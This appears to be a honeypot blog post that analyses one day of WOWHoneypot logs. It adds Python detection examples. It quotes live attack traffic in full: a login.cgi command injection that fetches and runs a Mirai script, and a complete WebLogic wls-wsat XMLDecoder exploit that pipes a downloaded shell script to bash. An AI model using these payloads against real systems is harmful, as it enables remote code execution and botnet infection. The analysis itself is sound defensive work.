S-Owl

S(ecurity)Owl

WOWHoneypot quick analysis (day 24)

This is a quick analysis of WOWHoneypot for 2018/6/27 (Wed), day 24 of operation.

Total number of accesses today: 170.

37 [2018-06-27 "GET /
34 [2018-06-27 "HEAD /
2 [2018-06-27 "GET /xampp/phpmyadmin/index.php
2 [2018-06-27 "GET /www/phpMyAdmin/index.php
2 [2018-06-27 "GET /web/phpMyAdmin/index.php
2 [2018-06-27 "GET /typo3/phpmyadmin/index.php
2 [2018-06-27 "GET /tools/phpMyAdmin/index.php
2 [2018-06-27 "GET /pmd/index.php
2 [2018-06-27 "GET /pma-old/index.php
2 [2018-06-27 "GET /pmamy/index.php
2 [2018-06-27 "GET /pmamy2/index.php
2 [2018-06-27 "GET /PMA/index.php
2 [2018-06-27 "GET /pma/index.php
2 [2018-06-27 "GET /PMA2/index.php
2 [2018-06-27 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-27 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-27 "GET /phpMyAdminold/index.php
2 [2018-06-27 "GET /phpMyAdmin.old/index.php
2 [2018-06-27 "GET /phpmyadmin-old/index.php
2 [2018-06-27 "GET /phpMyAdmin/index.php
2 [2018-06-27 "GET /phpmyadmin/index.php
2 [2018-06-27 "GET /phpMyadmin_bak/index.php
2 [2018-06-27 "GET /phpmyadmin2/index.php
2 [2018-06-27 "GET /phpmyadmin1/index.php
2 [2018-06-27 "GET /phpmyadmin0/index.php
2 [2018-06-27 "GET /phpadmin/index.php
2 [2018-06-27 "GET /mysql/index.php
2 [2018-06-27 "GET /mysqladmin/index.php
2 [2018-06-27 "GET /mysql-admin/index.php
2 [2018-06-27 "GET /myadmin/index.php
2 [2018-06-27 "GET /myadmin2/index.php
2 [2018-06-27 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-27 "GET /index.php
2 [2018-06-27 "GET /db/index.php
2 [2018-06-27 "GET /dbadmin/index.php
2 [2018-06-27 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-27 "GET /admin/PMA/index.php
2 [2018-06-27 "GET /admin/pma/index.php
2 [2018-06-27 "GET /admin/phpMyAdmin/index.php
2 [2018-06-27 "GET /admin/phpmyadmin/index.php
2 [2018-06-27 "GET /admin/phpmyadmin2/index.php
2 [2018-06-27 "GET /admin/mysql/index.php
2 [2018-06-27 "GET /admin/mysql2/index.php
2 [2018-06-27 "GET /admin/index.php
1 [2018-06-27 "PROPFIND /
1 [2018-06-27 "POST /xx.php
1 [2018-06-27 "POST /xw.php
1 [2018-06-27 "POST /wuwu11.php
1 [2018-06-27 "POST /w.php
1 [2018-06-27 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-27 "POST /s.php
1 [2018-06-27 "POST /sheep.php
1 [2018-06-27 "POST /db_session.init.php
1 [2018-06-27 "POST /db.init.php
1 [2018-06-27 "GET /.well-known/security.txt
1 [2018-06-27 "GET /webdav/
1 [2018-06-27 "GET /sitemap.xml
1 [2018-06-27 "GET /robots.txt
1 [2018-06-27 "GET /favicon.ico

As usual, I exclude the phpMyAdmin-related requests (82 from a single IP) and /. Entries in blue are ones already analyzed in earlier posts.

2 [2018-06-27 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-27 "POST /xx.php
1 [2018-06-27 "POST /xw.php
1 [2018-06-27 "POST /wuwu11.php
1 [2018-06-27 "POST /w.php
1 [2018-06-27 "POST /s.php
1 [2018-06-27 "POST /sheep.php
1 [2018-06-27 "POST /db_session.init.php
1 [2018-06-27 "POST /db.init.php
1 [2018-06-27 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-27 "GET /webdav/
1 [2018-06-27 "GET /.well-known/security.txt
1 [2018-06-27 "GET /sitemap.xml
1 [2018-06-27 "GET /robots.txt
1 [2018-06-27 "GET /favicon.ico
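The exclusion step above (drop the root path and the phpMyAdmin sweep) and the hunting log at the end of the post can both be scripted from the count-prefixed summary lines. The following is an added example, not code from the post or from WOWHoneypot itself. The author cut the sweep by source IP, which the summary lines do not carry, so the sweep is approximated here by path shape (every request in it targets an index.php under a candidate admin directory); the sample input is an abbreviated, constructed subset of the day's lines, and the regexes are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample: a representative subset of the day's summary lines shown above.
SUMMARY_LINES = """\
37 [2018-06-27 "GET /
34 [2018-06-27 "HEAD /
2 [2018-06-27 "GET /xampp/phpmyadmin/index.php
2 [2018-06-27 "GET /pma/index.php
2 [2018-06-27 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-27 "GET /index.php
2 [2018-06-27 "GET /admin/index.php
1 [2018-06-27 "PROPFIND /
1 [2018-06-27 "POST /xx.php
1 [2018-06-27 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-27 "GET /webdav/
1 [2018-06-27 "GET /.well-known/security.txt
1 [2018-06-27 "GET /robots.txt
1 [2018-06-27 "GET /favicon.ico
"""

# COUNT [DATE "METHOD PATH  (the path runs to end of line; it may contain '$' etc.)
LINE_RE = re.compile(r'^(\d+)\s+\[(\d{4}-\d{2}-\d{2})\s+"([A-Z]+)\s+(\S+)\s*$')


def parse_summary(text):
    """Parse the summary lines into dicts; blank or malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        count, date, method, path = m.groups()
        rows.append({"count": int(count), "date": date, "method": method, "path": path})
    return rows


def is_admin_sweep(path):
    """Approximation of the post's 'phpMyAdmin-related' bucket: a directory sweep
    in which every request targets .../index.php (the author filtered by source IP)."""
    return path.lower().endswith("/index.php")


def filter_noise(rows):
    """Drop requests for the bare root path (GET/HEAD/PROPFIND /) and the admin sweep."""
    return [r for r in rows if r["path"] != "/" and not is_admin_sweep(r["path"])]


# Defanged URLs are kept as logged (hxxp, [.]); stop at shell separators and quotes.
URL_RE = re.compile(r'hxxps?://[^\s;\'"|<>]+')
# A download command up to the next shell separator, redirection or quote.
CMD_RE = re.compile(r'\b(?:wget|curl)\b[^;|&\'"<>]*')


def extract_downloads(path):
    """Percent-decode a request path and pull out embedded download commands and URLs."""
    decoded = unquote(path)
    return {
        "decoded": decoded,
        "commands": [c.strip() for c in CMD_RE.findall(decoded)],
        "urls": URL_RE.findall(decoded),
    }


def hunting_log(rows):
    """The post's 'hunting log' view: (count, date, command) for rows carrying a download."""
    out = []
    for r in rows:
        for cmd in extract_downloads(r["path"])["commands"]:
            out.append((r["count"], r["date"], cmd))
    return out


if __name__ == "__main__":
    rows = parse_summary(SUMMARY_LINES)
    for r in filter_noise(rows):
        print(r["count"], r["method"], r["path"])
    for entry in hunting_log(rows):
        print("hunt:", entry)
```

Percent-decoding before matching matters here: the `wget` in the login.cgi request is only visible once `%20` and `%27` are decoded, which is also why a detection rule keyed on the raw path string would miss it.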

The new arrivals were the following series of requests. They appear to be probing the site's structure by looking for files that are likely to exist.

GET / HTTP/1.1
Accept-Encoding: identity
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36

GET /robots.txt HTTP/1.1
Accept-Encoding: identity

GET /sitemap.xml HTTP/1.1
Accept-Encoding: identity

GET /.well-known/security.txt HTTP/1.1
Accept-Encoding: identity

GET /favicon.ico HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.13.0
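One way to turn the observation above into a detection: group requests by client, and flag a client that asks for several of the well-known discovery files (robots.txt, sitemap.xml, security.txt, favicon.ico) within a short window, reporting the User-Agent values it used along the way, since the series above switches from a Chrome string to none to python-requests. This is an added example, not code from the post or from WOWHoneypot; the paths and User-Agents are the ones captured above, while the timestamps, the client labels and the second client's crawler User-Agent are constructed, and the assumption that the series came from one client is mine.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Well-known files a site-structure probe asks for (the set seen in the capture above).
DISCOVERY_PATHS = {"/robots.txt", "/sitemap.xml", "/.well-known/security.txt", "/favicon.ico"}

# Constructed sample: (timestamp, client, method, path, user_agent).
# Timestamps, client labels and client-B's User-Agent are made up; the post does not show them.
SAMPLE_REQUESTS = [
    ("2018-06-27T10:00:00", "client-A", "GET", "/",
     "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"),
    ("2018-06-27T10:00:01", "client-A", "GET", "/robots.txt", ""),
    ("2018-06-27T10:00:01", "client-A", "GET", "/sitemap.xml", ""),
    ("2018-06-27T10:00:02", "client-A", "GET", "/.well-known/security.txt", ""),
    ("2018-06-27T10:00:02", "client-A", "GET", "/favicon.ico", "python-requests/2.13.0"),
    # A crawler that reads robots.txt and comes back much later: should not trigger.
    ("2018-06-27T11:30:00", "client-B", "GET", "/robots.txt", "example-crawler/1.0 (constructed)"),
    ("2018-06-27T12:00:00", "client-B", "GET", "/", "example-crawler/1.0 (constructed)"),
]


def find_discovery_sweeps(requests, min_hits=3, window=timedelta(seconds=60)):
    """Return one finding per client that requested >= min_hits distinct discovery
    paths within `window`, together with every User-Agent it used in that window."""
    by_client = defaultdict(list)
    for ts, client, method, path, ua in requests:
        by_client[client].append((datetime.fromisoformat(ts), method, path, ua))

    findings = []
    for client, reqs in by_client.items():
        reqs.sort(key=lambda r: r[0])
        # Slide a window over the client's requests, anchored at each request in turn.
        for i, (t0, _, _, _) in enumerate(reqs):
            hits, uas = set(), set()
            for t, _, path, ua in reqs[i:]:
                if t - t0 > window:
                    break
                if path in DISCOVERY_PATHS:
                    hits.add(path)
                uas.add(ua)
            if len(hits) >= min_hits:
                findings.append({
                    "client": client,
                    "start": t0.isoformat(),
                    "paths": sorted(hits),
                    "user_agents": sorted(uas),
                    "ua_inconsistent": len(uas) > 1,
                })
                break  # one finding per client is enough
    return findings


if __name__ == "__main__":
    for f in find_discovery_sweeps(SAMPLE_REQUESTS):
        print(f)
```

The `ua_inconsistent` flag is the cheap signal here: a browser does not change its User-Agent between consecutive requests, so a mixed set within one short window is itself worth a look even before the path set is considered.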

This one is already known, but an attack on the WebLogic vulnerability arrived with a different payload, so it is likely a different actor. Since the attack targets Linux, the OS is placed in the User-Agent as an identifier; presumably the attacker uses it to pick out vulnerable IPs from their logs.

POST /wls-wsat/CoordinatorPortType HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 771
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>/bin/sh</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget --user-agent ""linux"" -O - hxxp://107.181.174[.]232/lin/st.sh | bash</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
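For the payload above, and for the WebLogic entry in the hunting log at the end of the post, the following added example (not code from the post or from WOWHoneypot) parses the SOAP body, reports whether the `WorkContext` header carries a `<java>` element, and pulls out the classes referenced, the `ProcessBuilder` argv, the fetched URL and the `--user-agent` marker the author points to. The sample body is the one captured above reproduced inline; the benign envelope used as a negative case is constructed, and the namespace constants are taken from the captured request.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# The request body captured in the post, reproduced inline as sample input.
SAMPLE_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>/bin/sh</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget --user-agent ""linux"" -O - hxxp://107.181.174[.]232/lin/st.sh | bash</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
"""

# Constructed negative case: a header without a WorkContext element.
BENIGN_BODY = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header/><soapenv:Body/></soapenv:Envelope>"
)

URL_RE = re.compile(r'hxxps?://[^\s;\'"|<>]+')          # defanged URLs as logged
UA_RE = re.compile(r'--user-agent\s+"*([^"\s]+)"*')     # tolerates the doubled quotes


def inspect_wls_wsat(body):
    """Return a finding if the SOAP Header has a WorkContext carrying a <java> element
    (an XMLDecoder-style object graph), else None."""
    root = ET.fromstring(body)
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return None
    ctx = header.find(f"{{{WORK_NS}}}WorkContext")
    if ctx is None:
        return None
    java = ctx.find("java")  # no namespace on <java> in the capture
    if java is None:
        return None
    return {
        "classes": sorted({el.get("class") for el in java.iter() if el.get("class")}),
        "argv": [s.text or "" for s in java.iter("string")],
        "methods": [el.get("method") for el in java.iter("void") if el.get("method")],
    }


def hunting_entry(finding):
    """The post's hunting-log view: the shell command (up to the first pipe), the URL
    it fetches and the User-Agent marker, for a /bin/sh -c style ProcessBuilder."""
    if not finding or finding["argv"][:2] != ["/bin/sh", "-c"] or len(finding["argv"]) < 3:
        return None
    cmd = finding["argv"][2]
    ua = UA_RE.search(cmd)
    return {
        "command": cmd.split("|")[0].strip(),
        "urls": URL_RE.findall(cmd),
        "user_agent_marker": ua.group(1) if ua else None,
    }


if __name__ == "__main__":
    finding = inspect_wls_wsat(SAMPLE_BODY)
    print(finding)
    print(hunting_entry(finding))
```

The check is deliberately structural (any `<java>` under `WorkContext`) rather than keyed on `ProcessBuilder`, so that payloads built from other classes are still surfaced; the class list is reported for triage. For untrusted input in a live pipeline, parse with `defusedxml.ElementTree.fromstring` instead of the standard-library parser, which the example uses only because it runs offline on a captured body.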


Today's hunting log: a Mirai variant and the WebLogic exploit.

2 [2018-06-27 wget hxxp://185.62.190[.]191/r
1 [2018-06-27 wget --user-agent ""linux"" -O - hxxp://107.181.174[.]232/lin/st.sh


That's all for today.